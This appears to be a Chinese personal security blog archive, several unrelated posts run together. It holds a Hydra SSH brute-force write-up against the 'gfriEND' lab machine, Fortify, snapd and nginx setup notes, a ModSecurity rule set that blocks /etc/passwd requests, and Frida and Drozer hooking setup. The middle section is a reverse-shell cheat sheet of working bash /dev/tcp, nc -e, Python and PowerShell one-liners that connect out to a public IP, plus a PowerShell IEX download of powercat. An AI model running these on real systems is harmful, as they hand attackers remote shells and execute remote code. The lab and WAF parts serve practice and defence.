Hydra (http://www.thc.org/thc-hydra) starting at 2020-01-08 09:56:30
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 36 login tries (l:6/p:6), ~3 tries per task
[DATA] attacking ssh://192.168.3.59:22/
[22][ssh] host: 192.168.3.59 login: alice password: 4lic3
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at 2020-01-08 09:56:35
root@bin4xin:/usr/share/wordlist#
如上爆破出ssh服务密码:[22][ssh] host: 192.168.3.59 login: alice password: 4lic3
直接ssh连接:
C:\Users\本阿信>ssh 192.168.3.59 -l alice
Could not create directory 'C:\\Users\\\346\234\254\351\230\277\344\277\241/.ssh'.
The authenticity of host '192.168.3.59 (192.168.3.59)' can't be established.
ECDSA key fingerprint is SHA256:lE5D8AvkJqcIwHiNuI9aSnC3ohlDrhPhjDljqSDy9sY.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (C:\\Users\\\346\234\254\351\230\277\344\277\241/.ssh/known_hosts).
alice@192.168.3.59's password:
Last login: Fri Dec 13 14:48:25 2019
alice@gfriEND:~$ id
uid=1000(alice) gid=1001(alice) groups=1001(alice)
靶机还没搞完,ssh连上就按套路查看了一下当前user可写的文件,查看到一些有趣的东西,但由于最近好多事,还没有搞到机器root,待更新。
alice@gfriEND:~$
alice@gfriEND:~$ find / -writable -type d 2>/dev/null
/home/alice
/home/alice/.cache
/home/alice/.my_secret
/run/user/1000
/run/shm
/run/lock
/tmp
/var/lib/php5
/var/crash
/var/tmp
/proc/1591/task/1591/fd
/proc/1591/fd
/proc/1591/map_files
/sys/fs/cgroup/systemd/user/1000.user/2.session
alice@gfriEND:~$ cd /home/alice/
alice@gfriEND:~$ cat .my_secret/
cat: .my_secret/: Is a directory
alice@gfriEND:~$ cd .my_secret/
alice@gfriEND:~/.my_secret$ ls
flag1.txt my_notes.txt
alice@gfriEND:~/.my_secret$ ls -la
total 16
drwxrwxr-x 2 alice alice 4096 Dec 13 14:10 .
drwxr-xr-x 4 alice alice 4096 Dec 13 14:47 ..
-rw-r--r-- 1 root root 306 Dec 13 13:04 flag1.txt
-rw-rw-r-- 1 alice alice 119 Dec 13 12:23 my_notes.txt
alice@gfriEND:~/.my_secret$ cat flag1.txt
Greattttt my brother! You saw the Alice's note! Now you save the record information to give to bob!
I know if it's given to him then Bob will be hurt but this is better than Bob cheated!
Now your last job is get access to the root and read the flag ^_^
Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}
alice@gfriEND:~/.my_secret$ cat my_notes.txt
Woahhh! I like this company, I hope that here i get a better partner than bob ^_^,
hopefully Bob doesn't know my notes
各种姿势尝试:
alice@gfriEND:~/.my_secret$ cd ..
alice@gfriEND:~$ l
alice@gfriEND:~$ ls
alice@gfriEND:~$ cd ..
alice@gfriEND:/home$ ls
aingmaung alice eweuhtandingan sundatea
alice@gfriEND:/home$ ls -la
total 24
drwxr-xr-x 6 root root 4096 Dec 13 12:18 .
drwxr-xr-x 22 root root 4096 Dec 13 10:21 ..
drwxr-xr-x 2 aingmaung aingmaung 4096 Dec 13 12:18 aingmaung
drwxr-xr-x 4 alice alice 4096 Dec 13 14:47 alice
drwxr-xr-x 2 eweuhtandingan eweuhtandingan 4096 Dec 13 12:18 eweuhtandingan
drwxr-xr-x 2 sundatea sundatea 4096 Dec 13 12:18 sundatea
alice@gfriEND:/home$ cd /proc/1591/map_files
-bash: cd: /proc/1591/map_files: No such file or directory
alice@gfriEND:/home$ ls
aingmaung alice eweuhtandingan sundatea
alice@gfriEND:/home$ cd /proc/1592/
alice@gfriEND:/proc/1592$ ls
ls: cannot read symbolic link cwd: Permission denied
ls: cannot read symbolic link root: Permission denied
ls: cannot read symbolic link exe: Permission denied
attr comm fd map_files net pagemap sessionid status
autogroup coredump_filter fdinfo maps ns personality setgroups syscall
auxv cpuset gid_map mem numa_maps projid_map smaps task
cgroup cwd io mountinfo oom_adj root stack timers
clear_refs environ limits mounts oom_score sched stat uid_map
cmdline exe loginuid mountstats oom_score_adj schedstat statm wchan
alice@gfriEND:/proc/1592$ cat map_files/
cat: map_files/: Permission denied
alice@gfriEND:/proc/1592$ ls -la
ls: cannot read symbolic link cwd: Permission denied
ls: cannot read symbolic link root: Permission denied
ls: cannot read symbolic link exe: Permission denied
total 0
dr-xr-xr-x 9 root root 0 Jan 8 17:01 .
dr-xr-xr-x 102 root root 0 Jan 8 16:29 ..
dr-xr-xr-x 2 root root 0 Jan 8 17:01 attr
-rw-r--r-- 1 root root 0 Jan 8 17:01 autogroup
-r-------- 1 root root 0 Jan 8 17:01 auxv
-r--r--r-- 1 root root 0 Jan 8 17:01 cgroup
--w------- 1 root root 0 Jan 8 17:01 clear_refs
-r--r--r-- 1 root root 0 Jan 8 17:01 cmdline
-rw-r--r-- 1 root root 0 Jan 8 17:01 comm
-rw-r--r-- 1 root root 0 Jan 8 17:01 coredump_filter
-r--r--r-- 1 root root 0 Jan 8 17:01 cpuset
lrwxrwxrwx 1 root root 0 Jan 8 17:01 cwd
-r-------- 1 root root 0 Jan 8 17:01 environ
lrwxrwxrwx 1 root root 0 Jan 8 17:01 exe
dr-x------ 2 root root 0 Jan 8 17:01 fd
dr-x------ 2 root root 0 Jan 8 17:01 fdinfo
-rw-r--r-- 1 root root 0 Jan 8 17:01 gid_map
-r-------- 1 root root 0 Jan 8 17:01 io
-r--r--r-- 1 root root 0 Jan 8 17:01 limits
-rw-r--r-- 1 root root 0 Jan 8 17:01 loginuid
dr-x------ 2 root root 0 Jan 8 17:01 map_files
-r--r--r-- 1 root root 0 Jan 8 17:01 maps
-rw------- 1 root root 0 Jan 8 17:01 mem
-r--r--r-- 1 root root 0 Jan 8 17:01 mountinfo
-r--r--r-- 1 root root 0 Jan 8 17:01 mounts
-r-------- 1 root root 0 Jan 8 17:01 mountstats
dr-xr-xr-x 5 root root 0 Jan 8 17:01 net
dr-x--x--x 2 root root 0 Jan 8 17:01 ns
-r--r--r-- 1 root root 0 Jan 8 17:01 numa_maps
-rw-r--r-- 1 root root 0 Jan 8 17:01 oom_adj
-r--r--r-- 1 root root 0 Jan 8 17:01 oom_score
-rw-r--r-- 1 root root 0 Jan 8 17:01 oom_score_adj
-r-------- 1 root root 0 Jan 8 17:01 pagemap
-r-------- 1 root root 0 Jan 8 17:01 personality
-rw-r--r-- 1 root root 0 Jan 8 17:01 projid_map
lrwxrwxrwx 1 root root 0 Jan 8 17:01 root
-rw-r--r-- 1 root root 0 Jan 8 17:01 sched
-r--r--r-- 1 root root 0 Jan 8 17:01 schedstat
-r--r--r-- 1 root root 0 Jan 8 17:01 sessionid
-rw-r--r-- 1 root root 0 Jan 8 17:01 setgroups
-r--r--r-- 1 root root 0 Jan 8 17:01 smaps
-r-------- 1 root root 0 Jan 8 17:01 stack
-r--r--r-- 1 root root 0 Jan 8 17:01 stat
-r--r--r-- 1 root root 0 Jan 8 17:01 statm
-r--r--r-- 1 root root 0 Jan 8 17:01 status
谷歌一波:
stackoverflow原问题:
When I run a Fortify analysis against a Java project I receive this error :
[warning]: No rules files found
[error]: No rules files found
Where can I configure the rules file ?
原答案:
Navigate to the bin folder of your fortify installation
Enter scapostinstall
Enter 2 to select Settings
Enter 2 to select Proxy Server Host
Enter the name of the proxy server
Enter 3 to select Proxy Server Port.
Enter the proxy server's port number.
Exit and run fortifyupdate.cmd
原答案的意思就是说需要对fortify进行代理配置,(需科学上网)后进行规则库的下载配置。
进入fortify安装的目录,对fortify进行代理配置,配置过程代码如下:
#进入fortify的安装目录(windows环境)
E:
cd fortify\bin\
E:\fortify\bin>scapostinstall
[1] Migration...
[2] Settings...
[s] Display all settings
[q] Exit
Please select the desired action (1,2,s,q): 2
[1] General...
[2] Fortify Update...
[3] Software Security Center Settings...
[s] Display all settings
[r] Return
[q] Exit
Please select the desired action (1,2,3,s,r,q): 2
[1] Update Server URL
[2] Proxy Server Host
[3] Proxy Server Port
[4] Proxy Server Username
[5] Proxy Server Password
[s] Display all settings
[r] Return
[q] Exit
Please select the desired action (1,2,3,4,5,s,r,q): 2
Proxy Server Host [default: ]: localhost
[1] Update Server URL
[2] Proxy Server Host
[3] Proxy Server Port
[4] Proxy Server Username
[5] Proxy Server Password
[s] Display all settings
[r] Return
[q] Exit
Please select the desired action (1,2,3,4,5,s,r,q): 3
Proxy Server Port [default: ]: 8080
[1] Update Server URL
[2] Proxy Server Host
[3] Proxy Server Port
[4] Proxy Server Username
[5] Proxy Server Password
[s] Display all settings
[r] Return
[q] Exit
Please select the desired action (1,2,3,4,5,s,r,q): q
以上fortify客户端配置代理结束,然后直接输入命令进行规则库下载更新:
输入fortifyupdate更新命令,更新代码如下:
E:\fortify\bin>fortifyupdate.cmd
Using proxy server: localhost:8080
Storing Updated Security Content ...
E:\fortify\Core\config\rules
Fortify Secure Coding Rules, Core, Annotations v2015.2.0.0008
Fortify Secure Coding Rules, Extended, JSP v2015.2.0.0008
Fortify Secure Coding Rules, Core, Classic ASP, VBScript, and VB6 v2015.2.0.0008
Fortify Secure Coding Rules, Core, ActionScript 3.0 v2015.2.0.0008
Fortify Secure Coding Rules, Core, C/C++ v2015.2.0.0008
Fortify Secure Coding Rules, Extended, Java v2015.2.0.0008
Fortify Secure Coding Rules, Core, Android v2015.2.0.0008
Fortify Secure Coding Rules, Core, COBOL v2015.2.0.0008
Fortify Secure Coding Rules, Extended, C/C++ v2015.2.0.0008
Fortify Secure Coding Rules, Core, .NET v2015.2.0.0008
Fortify Secure Coding Rules, Core Preview, ABAP v2014.4.0.0008
Fortify Secure Coding Rules, Extended, Configuration v2015.2.0.0008
Fortify Secure Coding Rules, Extended, Content v2015.2.0.0008
Fortify Secure Coding Rules, Core, Objective-C v2015.2.0.0008
Fortify Secure Coding Rules, Core, PHP v2015.2.0.0008
Fortify Secure Coding Rules, Core, ABAP v2015.2.0.0008
Fortify Secure Coding Rules, Extended, SQL v2015.2.0.0008
Fortify Secure Coding Rules, Core, JavaScript v2015.2.0.0008
Fortify Secure Coding Rules, Core, SQL v2015.2.0.0008
Fortify Secure Coding Rules, Extended, .NET v2015.2.0.0008
Fortify Secure Coding Rules, Core, Java v2015.2.0.0008
Fortify Secure Coding Rules, Core, Ruby v2015.2.0.0008
Fortify Secure Coding Rules, Core, ColdFusion v2015.2.0.0008
Fortify Secure Coding Rules, Core, Python v2015.2.0.0008
Removing Old Metadata Files ...
E:\fortify\Core\config\ExternalMetadata
Main External List Mappings v2019.1.0.0007
Storing Updated Metadata Files ...
E:\fortify\Core\config\ExternalMetadata
Main External List Mappings v2015.2.0.0008
配置完就可以愉快地使用fortify进行机器扫描分析代码了。
敬上。感谢您的阅读
# apt install snapd
正在读取软件包列表... 完成
正在分析软件包的依赖关系树
正在读取状态信息... 完成
snapd 已经是最新版 (2.42.1-1)。
升级了 0 个软件包,新安装了 0 个软件包,要卸载 0 个软件包,有 26 个软件包未被升级
sudo snap install scrcpy.snap --dangerous
由于直接设置 http_proxy 环境变量无法设置上, 作者在 snapd 中直接设置proxy, 方法如下:
# 前置操作, 修改 systemctl edit 使用的编辑器为 VIM, 如果不介意 Nano 可以跳过这一步
$ sudo tee -a /etc/profile <<-'EOF'
export SYSTEMD_EDITOR="/bin/vim"
EOF
$ source /etc/profile
# 开始设置代理
$ sudo systemctl edit snapd
加上:
[Service]
Environment="http_proxy=http://127.0.0.1:port"
Environment="https_proxy=http://127.0.0.1:port"
$ sudo systemctl daemon-reload
$ sudo systemctl restart snapd
实测相当有效
root@kali:/usr/local/scrcpy-test/scrcpy# sudo snap install scrcpy
2019-12-31T11:28:41+08:00 INFO Waiting for restart...
Download snap "core18" (1288) from channel "stable" 11% 14.7kB/s 57.7m^C^C^Z
[2]+ 已停止 sudo snap install scrcpy
如上下所示,速度快了十倍~十倍的快乐~
root@kali:/usr/local/scrcpy-test/scrcpy# sudo snap install scrcpy
2019-12-31T11:36:30+08:00 INFO Waiting for restart...
Download snap "scrcpy" (199) from channel "stable" 7% 129kB/s 9m51s
Warning: /snap/bin was not found in your $PATH. If you've not restarted your session since you
installed snapd, try doing that. Please see https://forum.snapcraft.io/t/9469 for more
details.
scrcpy v1.12 from sisco311 installed
scrcpy投屏需要usb调试权限; 具体步骤为[开发者模式]-[打开usb调试] 否则会报错:
root@kali:~# scrcpy
INFO: scrcpy 1.12 <https://github.com/Genymobile/scrcpy>
adb: error: failed to get feature set: no devices/emulators found
ERROR: "adb push" returned with value 1
报错如下:
root@kali:/snap/bin# ./scrcpy
cannot change profile for the next exec call: No such file or directory
snap-update-ns failed with code 1: No such file or directory
查看版本:
root@kali:~# snap version
snap 2.42.5
snapd 2.42.5
series 16
kali 2019.4
kernel 5.3.0-kali3-amd64
root@kali:~# snap version
snap 2.42.5
snapd 2.42.5
series 16
kali 2019.4
kernel 5.3.0-kali3-amd64
解决:
root@kali:/var/lib/snapd/apparmor/profiles# apparmor_parser -r /var/lib/snapd/apparmor/profiles/
参考
Snap-update-ns failing, cannot launch snaps;linux重启后启动scrcpy,snap报错
记录:关于bash shell的反弹:)随笔记
假定环境:
| kali被攻击机器;ip:192.168.3.32 | iZj6cgn7odv59wmjjhe6zwZ攻击机;ip:47.52.233.92 |
root@kali:/# bash -i >&/dev/tcp/47.52.233.92/1234 0>& 1
root@iZj6cgn7odv59wmjjhe6zwZ:~# nc -lvvp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from 223.240.212.236 37798 received!
root@kali:/# whoami
whoami
root
root@kali:/# ifconfig
ifconfig
eth0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
ether 1c:39:47:e5:d0:0d txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 132196 bytes 121378334 (115.7 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 132196 bytes 121378334 (115.7 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.3.32 netmask 255.255.255.0 broadcast 192.168.3.255
inet6 fe80::c895:5ca5:529a:eef3 prefixlen 64 scopeid 0x20<link>
ether 68:07:15:d5:46:16 txqueuelen 1000 (Ethernet)
RX packets 140963 bytes 101469044 (96.7 MiB)
RX errors 0 dropped 15 overruns 0 frame 0
TX packets 86373 bytes 16895892 (16.1 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
root@kali:/# nc -e /bin/sh 47.52.233.92 1234
root@iZj6cgn7odv59wmjjhe6zwZ:~# nc -lvvp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from 223.240.212.236 37812 received!
python -c 'import pty;pty.spawn("/bin/sh")'
# whoami
whoami
root
#
root@kali:/# python -c 'import socket,
subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("47.52.233.92",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
root@iZj6cgn7odv59wmjjhe6zwZ:~# nc -lvvp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from 223.240.212.236 37820 received!
# whoami
root
# id
uid=0(root) gid=0(root) 组=0(root)
实际反弹shell中成功的;应用场景: 1.WINDOWS系统 2.上传木马成功,但是没有交互式shell
powershell.exe -nop -c "$client = New-Object Net.Sockets.TCPClient('117.64.238.192',11223);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
powershell IEX (New-Object System.Net.Webclient).DownloadString
('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');
powercat -c 47.52.233.92 -p 11223 -e cmd
meterpreter可以直接开启
run getui -e
然后用rdesktop就能直接连了
hook技术是指在android上进行的跨进程操作,包括 一、native层hook,即:jni,本地调用java native interface,称之为本层hook; 二、java本地接口 三、java层hook
实际上,Android本身进行且维护着一套事件分发机制,而应用程序则包括应用触发事件和后台逻辑处理
壹.应用触发事件:比如app中,一个按钮对应一个url,点击则跳转默认浏览器访问url,称之为应用触发事件;
贰.后台逻辑处理:我们所看不到的后台处理逻辑程序;
比如上个栗子中:一个url按钮,我们点击后用户所看到的现象为:
按钮点击->跳转默认浏览器->浏览器地址栏填充为按钮url->访问;而对于后台来说,那么可能就没有那么简单了,当我们学会去看log日志的时候,我们会发现,后台代码程序所做的工作多得多得多。
添加于2021/02/05
这篇与WAF相关”技术”博客其实没有多少技术含量,只是当时刚刚接触到WAF,感觉非常的新鲜然后有了这篇博客,其实当时连LINUX基础常识都还不是非常的了解, 年少轻狂的来配置WAF肯定无法成功;现在回头来看当时的文笔还是较为稚嫩,通篇都是一些”转述”的代码块,没有自己的相关思想,是很糟糕的一篇博客。
刚好年底总结博客,总结到WAF这一块,正好把这一篇的文章给补上,整理文章可以查看,较于下面这篇文章,主要增加了自定义规则库的配置和相关验证,可通过上方目录链接直接跳转:
正好把这篇文章收个尾,我的有些文章写到一半,写不下去了就放着了。这个习惯不是很好。
记一次waf配置经历。忙里偷闲,正好有闲置的服务器,自己动动手配置看看。
经过实际操作验证,这里建议各位使用nginx1.13.8版本;源码包下载链接wget http://nginx.org/download/nginx-1.13.8.tar.gz
安装的过程大致是这样的一个过程:
git clone https://github.com/SpiderLabs/ModSecurity
nginx/1.13.8或者更高,极力推荐nginx/1.18.0
wget http://nginx.org/download/nginx-1.13.8.tar.gzsudo apt-get install openssl libssl-dev libpcre3 libpcre3-dev zlib1g-dev autoconf automake libtool gcc g++ make git clone https://github.com/SpiderLabs/ModSecurity-nginx.git modsecurity-nginx
./configure --add-module=/path/to/modsecurity-nginx
server {
listen 8077;
location / {
default_type text/plain;
return 200 "Thank you for requesting ${request_uri}\n";
}
}
/usr/local/nginx下,所以我的命令如下;
cd /usr/local/nginx && mkdir modsec && cd modsec
wget https://raw.githubusercontent.com/SpiderLabs/ModSecurity/v3/master/modsecurity.conf-recommended
mv modsecurity.conf-recommended modsecurity.conf
vim modsecurity.conf
修改SecRuleEngine DetectionOnly为SecRuleEngine On
同样,添加配置:
vim main.conf
内容为:
Include /usr/local/nginx/modsec/modsecurity.conf
SecRule ARGS:url "@contains admin" "id:2234,deny,log,status:403"
//在访问url内传输给url这个参数中存在admin字样进行拦截,并记录。
报错解决:[emerg] "modsecurity_rules_file" directive Rules error.
vim /etc/nginx/modsec/modsecurity.conf
注释掉下面配置语句
#SecUnicodeMapFile unicode.mapping 20127
server {
listen 8077;
server_name localhost;
modsecurity on;
modsecurity_rules_file /usr/local/nginx/modsec/main.conf;
#charset koi8-r;
#access_log logs/host.access.log main;
location / {
root html;
default_type text/plain;
return 200 "Thank you for requesting ${request_uri}\n";
#index index.html index.htm;
proxy_set_header Host $host;
}
error_page 404 403 405 /403.html;
location = /403.html {
root /usr/local/nginx/html/403 ;
}
如无法测试成功可参考以下链接:
添加于2021/02/05
我们从上面得到:
Include /usr/local/nginx/modsec/modsecurity.conf
SecRule ARGS:url "@contains admin" "id:2234,deny,log,status:403"
//在访问url内传输给url这个参数中存在admin字样进行拦截,并记录。
我们在安全开发的过程中若需要自写规则库进行WEB防御,可参考:
| 自写规则库定义一览 | |||
|---|---|---|---|
| REQUEST_LINE | 代表整个请求行 | SecRule REQUEST_LINE "!(^((?:(?:POS|GE)T|HEAD))|HTTP/(0\.9|1\.0|1\.1)$)" "phase:1,id:49,log,block,t:none" |
#该规则表示,仅允许请求方式为POST,GET以及HEAD,同时请求协议也仅允许为HTTP0.9/1.0/1.1 |
| REQUEST_METHOD | 代表请求方式 | SecRule REQUEST_METHOD "^(?:PUT|CONNECT|TRACE|DELETE)$" "phase:1,id:49,log,block,t:none" |
#该规则表示,如果请求方式是PUT、CONNECT、TRACE、DELETE的任意一种方式,则拦截此次访问 |
| REQUEST_PROTOCOL | 代表请求协议&版本 | SecRule REQUEST_PROTOCOL "!^HTTP/(0\.9|1\.0|1\.1)$" "phase:1,id:50,log,block,t:none" |
#该规则表示,如果访问协议不是HTTP,同时协议版本也不是0.9/1.0/1.1的话,拦截此次访问 |
| REQUEST_URI | 代表包含查询字符串数据在内的完整请求URL | SecRule REQUEST_URI "attack" "phase:1,id:52,t:none,t:urlDecode,t:lowercase,t:normalizePath" |
#该规则表示,如果请求URL中包含attack字符串,则拦截此次访问 |
| REQUEST_FILENAME | 代表不包含查询字符串数据在内的相对请求URL | SecRule REQUEST_FILENAME "/etc/passwd" "phase:1,id:53,log,block,t:none" |
#该规则表示,如果请求URL(不含传入参数)包含etc/passwd字符串,则拦截此次访问 |
| REQUEST_HEADERS | 代表所有请求头的集合,也可以用于检查所指定的请求头内容(通过使用REQUEST_HEADERS:Header-Name语法) | SecRule REQUEST_HEADERS:Host "^[\d\.]+$" "deny,id:47,log,status:403" |
#该规则表示,如果请求头中的HOST字段的内容为IP地址的话,则使用deny动作拒绝此次访问,同时向客户端返回403错误 |
效果图:
参考:
原文大量篇幅写的是代码的配置问题,后期修改后删除了大部分,有兴趣的可以看上面的第二个链接;
这一块,其实跟着原教程走了一个弯,这里原作者在教程中应用的是反向代理,我们可以通过以上成功的SERVER配置块了解到其实直接链接WAF让规则库生效即可。
以上。
直接上链接,不多bb。有空写实战:)
跟Frida-Hook框架运行模式差不多,均为C/S模式。
windows-drozer-2.4.4.msi下载
debian-linux-drozer-2.4.4.deb下载
android-drozer-2.3.4.apk下载
多提一句:
msi后缀为windows可执行文件,双击安装即可。
deb:dpkg -i <deb包>
apk是安卓包,下载到本地<adb install apk包>
C:\Users\本阿信>drozer console connect
Selecting 7ad839637216ad27 (OPPO OPPO R11 Plus 5.1.1)
.. ..:.
..o.. .r..
..a.. . ....... . ..nd
ro..idsnemesisand..pr
.otectorandroidsneme.
.,sisandprotectorandroids+.
..nemesisandprotectorandroidsn:.
.emesisandprotectorandroidsnemes..
..isandp,..,rotectorandro,..,idsnem.
.isisandp..rotectorandroid..snemisis.
,andprotectorandroidsnemisisandprotec.
.torandroidsnemesisandprotectorandroid.
.snemisisandprotectorandroidsnemesisan:
.dprotectorandroidsnemesisandprotector.
drozer Console (v2.4.4)
dz>
1.frida框架安装
frida框架为C/S模式,即客户端、服务端模式:
2.一个测试apk
3.hook代码(此处hook代码不便贴出,见谅)
这里Frida支持python3和python2.7,因为确实3和2.7之间还是有不同的地方,本文以python2.7安装Frida为例:
查看pip版本
pip --version
pip 18.1 from /usr/lib/python2.7/dist-packages/pip (python 2.7)
##你想在哪个环境下运行Frida,就用哪个命令(pip、pip3)
pip3 --version
pip 18.1 from /usr/lib/python3/dist-packages/pip (python 3.7)
确认是在2.7版本环境下安装即可:
pip install frida
Collecting frida
Downloading https://files.pythonhosted.org/packages/38/1b/8a462787cedda36c57227ed0babbd80c4c4cc5bc9c1f9b5aa285ed6aebba/frida-12.8.0.tar.gz
Building wheels for collected packages: frida
Running setup.py bdist_wheel for frida ... \
Successfully built frida
Installing collected packages: frida
Successfully installed frida-12.8.0
安装完frida,继续安装依赖项:frida-tools:
pip install frida-tools
100% |████████████████████████████████| 348k
此处基本frida框架就安装完成了,查看一下frida的版本号
frida --version
12.8.0
此处安装的是Frida的服务端,在手机端运行。手机端大多为ARM架构,但有的小伙伴使用的模拟器,所以先用命令查看一下手机的cpu架构:
adb shell
* daemon not running; starting now at tcp:5037
* daemon started successfully
shell@angler:/ $ su
root@angler:/ # getprop ro.product.cpu.abi
arm64-v8a
如果回显是arm就下载arm版本,回显x86就下载x86版本。
frida-server下载
这里记住千万不要下载错了,进去页面直接CTRL+F搜索server。下载完毕,重命名为frida-server
把frida-server传输到手机,(注意:pc端frida版本号与移动端一致):
##PC端
adb devices
adb push frida-server /data/local/tmp
adb forward tcp:27042 tcp:27042
adb forward tcp:27043 tcp:27043
##移动端
adb shell
root@angler:/data/local/tmp # cd /data/local/tmp/
root@angler:/data/local/tmp #./frida-server
在启动服务端frida-server后,在客户端进行操作:
##指定好pack包和js文件路径
frida -U -f <package-name> -l <hook.js-path>
##提示<package-name>Spawned成功后,输入%resume重启app后使app-hook注入
如下图,app重启后检测到hook框架代码弹出提示,此时js代码注入成功。
参考文档: Frida详细安装教程
窈窕HTTPS,正是TCP的好逑;
how to used http to https with nginx?is’s sounds fantastic!
其实证书早就颁发下来了,一直配置配不成功(小声bb)。纪念一下,2019-12-13号,chihou.pro升级为https协议。嘿嘿
sudo apt-get install libssl-dev
apt-get install libpcre3 libpcre3-dev
cd nginx/
./configure --prefix=/usr/local/nginx --with-http_stub_status_module --with-http_ssl_module --with-file-aio --with-http_realip_module
make
如果安装了nginx,到这里结束。
反之再加
make install
cd #你解压nginx的目录/sbin/
./nginx -V
nginx -V #注意是大v,看到下面有--with-http_ssl_module模块即可
nginx version: nginx/1.16.1
built with OpenSSL 1.1.1d 10 Sep 2019
TLS SNI support enabled
configure arguments: --with-cc-opt='-g -O2 --with-http_ssl_module
cp nginx /usr/sbin
复制到快速启动目录即可
证书申请下来后把证书传到服务器上就行了,配置nginx的https区块即可。
http{
server {
listen 443;
server_name XXX;
ssl on;
ssl_certificate /usr/local/nginx/conf/cert/214.pem;#你自己的证书地址
ssl_certificate_key /usr/local/nginx/conf/cert/21.key;
ssl_session_timeout 5m;
ssl_ciphers ECDHE-RSA-AES128-GCM-SHA256:ECDHE:ECDH:AES:HIGH:!NULL:!aNULL:!MD5:!ADH:!RC4;
ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
ssl_prefer_server_ciphers on;
location / {
}
}
}
nginx -t
systemctl reload nginx
配置完美滋滋去验证网站,畏(zhi)畏(gao)缩(qi)缩(ang)的输入https://www.chihou.pro,结果傻了眼,还是http的协议提示,好气。
赶紧趁着ssh还没断开赶紧查看配置哪里出了问题。 思路:因为配置了ssl,监听了443端口。所以服务器肯定在监听了443端口,先查查看:
netstatus -tunlp |grep 443#发现没有回显,那看看所有监听服务器
netstatus -tunlp#(仅仅展示一部分)发现服务器并未监听443
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 861/nginx: master p
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN 319/systemd-resolve
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 6029/sshd
如上代码,nginx配置了监听443,,实际上linux却没有监听,问题肯定就出在这上面
首先排除:nginx配置问题,因为nginx配置是能够通过的,所以暂时排除。
第二就是防火墙的问题,先登上控制台确认443端口开放,没问题。然后登上服务器查看服务器防火墙状态,因为是ubuntu服务器所有查看ufw状态:
systemctl status ufw
● ufw.service - Uncomplicated firewall
Loaded: loaded (/lib/systemd/system/ufw.service; enabled; vendor preset: enabled)
Active: active (exited) since Fri 2019-12-13 10:46:00 CST; 1h 54min ago
Docs: man:ufw(8)
Process: 31826 ExecStop=/lib/ufw/ufw-init stop (code=exited, status=0/SUCCESS)
Process: 31967 ExecStart=/lib/ufw/ufw-init start quiet (code=exited, status=0/SUCCESS)
Main PID: 31967 (code=exited, status=0/SUCCESS)
Dec 13 10:46:00 iZj6cgn7odv59wmjjhe6zwZ systemd[1]: Starting Uncomplicated firewall...
Dec 13 10:46:00 iZj6cgn7odv59wmjjhe6zwZ systemd[1]: Started Uncomplicated firewall.
看到服务器防火墙是active状态,但是接下来却让我目瞪口呆:
ufw status verbose
Status: inactive
ufw status numbered
Status: inactive
不管怎么写命令,他都是提示incative,我瞬间就崩溃了,我甚至还尝试了systemctl status verbose ufw这样的蠢命令- -|||
后来各种查命令,因为我坚信服务器上还有第二个防火墙~
理由:控制台开放了443,而我进行验证却验证失败:
telnegt $IP 443反馈:telnet: Unable to connect to remote host: Connection refused,所以我就一直钻到防火墙的牛角尖出不来了。
兜兜转转,圈圈圆圆。所以就一直拖到了今天TAT
后来证实其实问题不是在防火墙上,今天偶然网上冲浪,看到个帖子:
(建议右键新建页面打开~笔芯),引用文章的话:
如果无法连接,通常是防火墙,或者nginx为(未)(我真是个天才)启动等可能的因素;
冷静分析问题,查看错误信息,才是解决问题的办法
联想到我的问题,难道?是nginx根本没有重启?一语惊醒梦中人。赶紧登上服务器。
既然systemctl没用,那直接用nginx配置命令
nginx -s reload
输入chihou.pro-键入F5
她居然跳转了https页面,我哭了。
如果这篇文章帮助到了您,那不如在心里大大喊一声nice~
敬上。感谢您的阅读
参考:
启动Nginx出现Failed to start nginx.service:unit not found
Ubuntu编译安装nginx
nginx 动态添加ssl模块
容器内是自己写的个人博客,处于安全考虑用的是静态页面博客。但是由于公网维护博客较为困难,加上之前用的开源存储云服务项目,那么就需要php来解析,所以打算试一试能不能「nginx+php」的方式方便个人维护博客。
所以本菜最终想完成的是这样的:
nginx容器能够启动,HTML页面能够正常回显,但是解析php页面会报错:404-NOT-FOUND;
vi index.php
<?php
phpinfo();
?>
